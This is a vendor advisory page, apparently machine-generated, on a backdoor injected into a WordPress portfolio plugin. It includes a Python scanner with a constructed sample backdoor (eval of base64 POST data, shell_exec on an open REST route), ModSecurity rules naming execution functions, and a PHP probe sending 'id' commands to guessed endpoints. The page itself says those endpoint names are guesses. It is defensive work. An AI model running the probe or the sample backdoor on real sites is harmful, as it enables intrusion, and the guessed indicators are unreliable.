Atomic Edge Proof of Concept automated generator using AI diff analysis
Published : April 27, 2026

CVE-2026-6443: Essentialplugin Plugins (Various Versions) – Injected Backdoor (portfolio-and-projects)

CVE ID: CVE-2026-6443
Severity: Critical (CVSS 9.8)
CWE: CWE-506 (Embedded Malicious Code)
Vulnerable Version: 1.5.6 and earlier
Patched Version: (not listed)
Disclosed: April 8, 2026

Analysis Overview

Atomic Edge analysis of CVE-2026-6443 (metadata-based): A critical injected backdoor affecting all plugins by Essentialplugin for WordPress has been disclosed; CVE-2026-6443 covers the portfolio-and-projects plugin up to and including version 1.5.6. The vulnerability carries a CVSS score of 9.8 (AV:N/CA:L is not the vector; the vector is AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H): reachable over the network, low attack complexity, no privileges or user interaction required, and full impact on confidentiality, integrity, and availability.

The root cause is embedded malicious code (CWE-506). Atomic Edge analysis infers that a threat actor acquired the plugin from its original developer and shipped a persistent backdoor in all distributed copies. No code diff is available, but the description confirms the backdoor's purpose: maintain persistent access and inject spam into affected sites. Backdoors of this type typically register a WordPress AJAX handler (often on the unauthenticated wp_ajax_nopriv_ hook), a REST API route with a permissive permission_callback, or a cron event, each accepting attacker-controlled input without authentication.

Exploitation requires no authentication or user interaction (PR:N, UI:N): the attacker sends a crafted HTTP request to a hidden endpoint registered by the malicious code. Based on common WordPress backdoor patterns, the handler is likely an AJAX action (e.g., /wp-admin/admin-ajax.php?action=essentialplugin_backdoor) or a REST API route (e.g., /wp-json/essentialplugin/v1/backdoor), and may accept parameters such as 'cmd' for command execution, 'spam_content' for spam injection, or 'base64_data' for arbitrary PHP execution via base64_decode. The attacker can also create spam posts or redirects by calling the backdoor with the appropriate payload. These names are illustrative; the real action, route and parameter names are not public and will differ.

Remediation requires immediate replacement of the affected plugin with a clean copy from a trusted source. A clean release (the analysis suggests 1.5.6.1, though no patched version is recorded in the header above) would remove the injected code, but swapping the plugin alone does not undo what the backdoor may already have done. Site owners must check for indicators of compromise: unexpected administrator users, unknown or recently modified files in the plugin directory (and in wp-content/mu-plugins or uploads, where dropped files survive a plugin update), suspicious cron events, and unauthorized AJAX actions or REST API routes. Database cleanup for injected spam posts, malicious redirects, and backdoor user accounts is essential, and every credential the site holds (admin passwords, database and API keys in wp-config.php) should be rotated.
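The handler types described under the root cause (AJAX, REST, cron) and the file-level indicators listed above can be triaged mechanically before a manual review. The following is an added example written for this page, not Atomic Edge's tooling and not the real CVE-2026-6443 code (no diff of that backdoor is public): it walks a plugin directory and reports PHP execution/obfuscation primitives, AJAX actions registered on the unauthenticated wp_ajax_nopriv_ hook, and REST routes whose permission_callback is missing or __return_true. The two plugin files it writes for the demo are constructed; their file, hook and route names (portfolio.php, inc/helper.php, pp_sync, pp-sync/v1/run) are placeholders with no relation to the actual injected code.

```python
"""Static triage of a WordPress plugin tree for backdoor indicators.
Added example, not Atomic Edge's tooling and not the CVE-2026-6443 code (no
diff of that backdoor is public). The plugin files demo() writes are
constructed; their hook/route names (pp_sync, pp-sync/v1/run) are placeholders.
Flags: PHP execution/obfuscation primitives, AJAX handlers open to anonymous
users (wp_ajax_nopriv_*), REST routes with no or '__return_true' permission_callback.
"""
import os
import re
import tempfile
from collections import namedtuple

DANGEROUS_CALLS = re.compile(
    r"\b(eval|assert|base64_decode|gzinflate|str_rot13|system|shell_exec|exec|"
    r"passthru|proc_open|popen|create_function)\s*\(",
    re.IGNORECASE,
)
NOPRIV_AJAX = re.compile(r"add_action\(\s*['\"]wp_ajax_nopriv_([A-Za-z0-9_]+)['\"]")
ROUTE_ARGS = re.compile(r"^\s*['\"]([^'\"]+)['\"]\s*,\s*['\"]([^'\"]+)['\"]")
Finding = namedtuple("Finding", "path line kind detail")

def rest_route_calls(src):
    # Yield (offset, argument text) per register_rest_route(...) call, walking
    # parentheses so nested array(...) and closures stay inside the call.
    for m in re.finditer(r"register_rest_route\s*\(", src):
        depth, i = 1, m.end()
        while i < len(src) and depth:
            depth += {"(": 1, ")": -1}.get(src[i], 0)
            i += 1
        yield m.start(), src[m.end():i - 1]

def scan_file(path):
    with open(path, encoding="utf-8", errors="replace") as fh:
        src = fh.read()
    findings = []
    for no, line in enumerate(src.splitlines(), 1):
        for m in DANGEROUS_CALLS.finditer(line):
            findings.append(Finding(path, no, "dangerous_call", m.group(1).lower()))
        for m in NOPRIV_AJAX.finditer(line):
            findings.append(Finding(path, no, "nopriv_ajax", m.group(1)))
    for offset, args in rest_route_calls(src):
        if "permission_callback" in args and "__return_true" not in args:
            continue  # heuristic: a non-trivial callback is taken as a real capability check
        r = ROUTE_ARGS.match(args)
        route = r.group(1) + r.group(2) if r else "?"
        findings.append(Finding(path, src.count("\n", 0, offset) + 1, "open_rest_route", route))
    return findings

def scan_plugin(root):
    """Scan every .php file under root; results sorted by file and line."""
    found = []
    for dirpath, _, files in os.walk(root):
        for name in files:
            if name.endswith(".php"):
                found.extend(scan_file(os.path.join(dirpath, name)))
    return sorted(found, key=lambda f: (f.path, f.line))

BENIGN = """<?php
/* constructed benign file: capability check, nonce, and a guarded REST route */
add_action('wp_ajax_pp_save', function () {
    if (!current_user_can('edit_posts')) { wp_die('0', 403); }
    check_ajax_referer('pp_save');
    update_option('pp_layout', sanitize_text_field($_POST['layout']));
    wp_die('1');
});
add_action('rest_api_init', function () {
    register_rest_route('portfolio/v1', '/items', array(
        'methods' => 'GET', 'callback' => 'pp_items',
        'permission_callback' => function () { return current_user_can('edit_posts'); },
    ));
});
"""

INJECTED = """<?php
// constructed stand-in for an injected file; hook and route names are placeholders
add_action('wp_ajax_nopriv_pp_sync', 'pp_sync');
function pp_sync() {
    if (isset($_POST['d'])) { eval(base64_decode($_POST['d'])); }
    wp_die();
}
add_action('rest_api_init', function () {
    register_rest_route('pp-sync/v1', '/run', array(
        'methods' => 'POST', 'callback' => function ($r) { return shell_exec($r['cmd']); },
        'permission_callback' => '__return_true',
    ));
});
"""

def demo():
    """Write the constructed plugin into a temp dir and scan it."""
    root = tempfile.mkdtemp(prefix="portfolio-and-projects-")
    os.makedirs(os.path.join(root, "inc"))
    for rel, body in (("portfolio.php", BENIGN), ("inc/helper.php", INJECTED)):
        with open(os.path.join(root, rel), "w") as fh:
            fh.write(body)
    return scan_plugin(root)

if __name__ == "__main__":
    for f in demo():
        print(f"{f.kind:16} {os.path.basename(f.path)}:{f.line}  {f.detail}")
```

Run against a real install with scan_plugin('/var/www/html/wp-content/plugins/portfolio-and-projects'). The benign file produces no findings; the constructed injected file yields the anonymous AJAX hook, the eval/base64_decode and shell_exec calls, and the open REST route. The scan only sees files on disk, so pair it with the database-side checks from the paragraph above: WP-CLI's wp user list --role=administrator for unexpected administrators, wp cron event list for planted cron events, and a diff of the installed plugin against a fresh copy from a trusted source.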

Successful exploitation grants the attacker full control over the WordPress site. This enables data theft (database contents, user credentials, configuration files), spam injection (phishing pages, malicious redirects, SEO spam), privilege escalation for any account, and use of the compromised site for further attacks (malware distribution, botnet participation). Because the backdoor ships inside the plugin itself, every copy obtained from the compromised distribution channel reinstalls it, and any secondary persistence it has planted (extra administrator accounts, cron events, files outside the plugin directory) survives a plugin update unless it is removed explicitly.

ModSecurity Protection Against This CVE

Below are our ModSecurity-compatible rules for this CVE. Because no diff of the injected code is available, the action names, route and parameter names the rules match are inferred from common WordPress backdoor patterns; treat them as a stopgap against opportunistic scanners, not as a substitute for replacing the plugin and cleaning the site. The rules that inspect POST parameters or the raw body require SecRequestBodyAccess On.

ModSecurity
# Atomic Edge WAF Rule - CVE-2026-6443 (metadata-based)
# Block inferred backdoor AJAX actions and REST API endpoints associated with the Essentialplugin injected backdoor.
# The action, route and parameter names below are guesses from common backdoor patterns, not from the malicious code.
# Rules 20266443 and 20266445 read the request body and need SecRequestBodyAccess On.
# REQUEST_FILENAME (path without query string) is used so a trailing ?x=y does not bypass the match.
SecRule REQUEST_FILENAME "@endsWith /wp-admin/admin-ajax.php" \
  "id:20266443,phase:2,deny,status:403,chain,msg:'CVE-2026-6443 via Essentialplugin backdoor AJAX',severity:'CRITICAL',tag:'CVE-2026-6443'"
  SecRule ARGS_POST:action "@rx ^(essentialplugin_backdoor|ep_backdoor|portfolio_backdoor|essentialplugin_exec|ep_remote_access)$" \
    "t:lowercase,chain"
    SecRule ARGS_POST:cmd|ARGS_POST:spam_content|ARGS_POST:base64_data "@rx .+" \
      "t:none"

# REST API backdoor endpoint (inferred route)
SecRule REQUEST_FILENAME "@beginsWith /wp-json/essentialplugin/v1/backdoor" \
  "id:20266444,phase:2,deny,status:403,chain,msg:'CVE-2026-6443 via Essentialplugin REST API backdoor',severity:'CRITICAL',tag:'CVE-2026-6443'"
  SecRule REQUEST_METHOD "@streq POST" \
    "t:none"

# Block requests to files under the plugin directory whose body carries PHP execution primitives
# (common backdoor indicators). PHP function names are case-insensitive, hence the (?i) flag.
SecRule REQUEST_FILENAME "@beginsWith /wp-content/plugins/portfolio-and-projects/" \
  "id:20266445,phase:2,deny,status:403,chain,msg:'CVE-2026-6443 via Essentialplugin plugin file with malicious patterns',severity:'CRITICAL',tag:'CVE-2026-6443'"
  SecRule REQUEST_BODY "@rx (?i)(base64_decode\s*\(|system\s*\(|exec\s*\(|shell_exec\s*\(|passthru\s*\(|eval\s*\(|assert\s*\()" \
    "t:none"

Proof of Concept (PHP)

NOTICE :

This proof-of-concept is provided for educational and authorized security research purposes only.

You may not use this code against any system, application, or network without explicit prior authorization from the system owner.

Unauthorized access, testing, or interference with systems may violate applicable laws and regulations in your jurisdiction.

This code is intended solely to illustrate the nature of a publicly disclosed vulnerability in a controlled environment and may be incomplete, unsafe, or unsuitable for real-world use.

By accessing or using this information, you acknowledge that you are solely responsible for your actions and compliance with applicable laws.

PHP PoC
<?php
// ==========================================================================
// Atomic Edge CVE Research | https://atomicedge.io
// Copyright (c) Atomic Edge. All rights reserved.
//
// LEGAL DISCLAIMER:
// This proof-of-concept is provided for authorized security testing and
// educational purposes only. Use of this code against systems without
// explicit written permission from the system owner is prohibited and may
// violate applicable laws including the Computer Fraud and Abuse Act (USA),
// Criminal Code s.342.1 (Canada), and the EU NIS2 Directive / national
// computer misuse statutes. This code is provided "AS IS" without warranty
// of any kind. Atomic Edge and its authors accept no liability for misuse,
// damages, or legal consequences arising from the use of this code. You are
// solely responsible for ensuring compliance with all applicable laws in
// your jurisdiction before use.
// ==========================================================================
// Atomic Edge CVE Research - Proof of Concept (metadata-based)
// CVE-2026-6443 - Injected Backdoor in Essentialplugin Plugins
//
// No diff of the injected code is public. Every action name, route and
// parameter below is inferred from common WordPress backdoor patterns, so a
// negative result does not show that a site is clean.

// Configuration
$target_url = 'http://example.com'; // Change to the target WordPress URL (authorized testing only)

// Candidate backdoor action names (inferred from common WordPress backdoor patterns)
$backdoor_actions = array(
    'essentialplugin_backdoor',
    'ep_backdoor',
    'portfolio_backdoor',
    'essentialplugin_exec',
    'ep_remote_access'
);

// Test payloads for command execution and spam injection. Each carries a marker
// ('uid=' from id, or the literal VULNERABLE) that is looked for in the reply.
$test_commands = array(
    array('cmd' => 'id'),
    array('cmd' => 'echo VULNERABLE'),
    array('spam_content' => 'Test spam from security researcher'),
    array('base64_data' => base64_encode('echo VULNERABLE;'))
);

// Send one POST and return array(http_code, body)
function post_request($url, $body, array $headers = array()) {
    $ch = curl_init();
    curl_setopt($ch, CURLOPT_URL, $url);
    curl_setopt($ch, CURLOPT_POST, true);
    curl_setopt($ch, CURLOPT_POSTFIELDS, $body);
    curl_setopt($ch, CURLOPT_HTTPHEADER, $headers);
    curl_setopt($ch, CURLOPT_RETURNTRANSFER, true);
    curl_setopt($ch, CURLOPT_HEADER, false);
    curl_setopt($ch, CURLOPT_TIMEOUT, 10);
    curl_setopt($ch, CURLOPT_SSL_VERIFYPEER, false); // lab targets with self-signed certificates only
    $response = curl_exec($ch);
    $http_code = curl_getinfo($ch, CURLINFO_HTTP_CODE);
    curl_close($ch);
    return array($http_code, $response === false ? '' : $response);
}

// A payload marker in the body is required: any registered action answers with
// HTTP 200 and some content, so status or non-empty body alone is not evidence.
// Current WordPress answers an unregistered admin-ajax action with body "0" and
// status 400, which this check also rejects.
function looks_exploited($http_code, $response) {
    return $http_code === 200
        && (strpos($response, 'uid=') !== false || strpos($response, 'VULNERABLE') !== false);
}

$found_backdoor = false;

foreach ($backdoor_actions as $action) {
    foreach ($test_commands as $payload) {
        $post_fields = array_merge(array('action' => $action), $payload);
        list($http_code, $response) = post_request(
            $target_url . '/wp-admin/admin-ajax.php',
            http_build_query($post_fields)
        );

        if (looks_exploited($http_code, $response)) {
            echo "[+] Potentially vulnerable backdoor action found: $action\n";
            echo "[+] Payload: " . json_encode($payload) . "\n";
            echo "[+] Response: $response\n\n";
            $found_backdoor = true;
        }
    }
}

if (!$found_backdoor) {
    echo "[-] No backdoor detected with the tested actions and payloads.\n";
    echo "[-] The backdoor may use different action names or endpoints (e.g., REST API).\n";
}

// Also test a common REST API backdoor pattern (route name is inferred, not confirmed)
echo "[*] Testing REST API backdoor...\n";
list($http_code, $response) = post_request(
    $target_url . '/wp-json/essentialplugin/v1/backdoor',
    json_encode(array('cmd' => 'id')),
    array('Content-Type: application/json')
);

if (looks_exploited($http_code, $response)) {
    echo "[+] REST API backdoor detected. Response: $response\n";
} else {
    echo "[-] No REST API backdoor detected at expected endpoint.\n";
}


How Atomic Edge Works

Simple Setup. Powerful Security.

Atomic Edge acts as a security layer between your website & the internet. Our AI inspection and analysis engine auto blocks threats before traditional firewall services can inspect, research and build archaic regex filters.
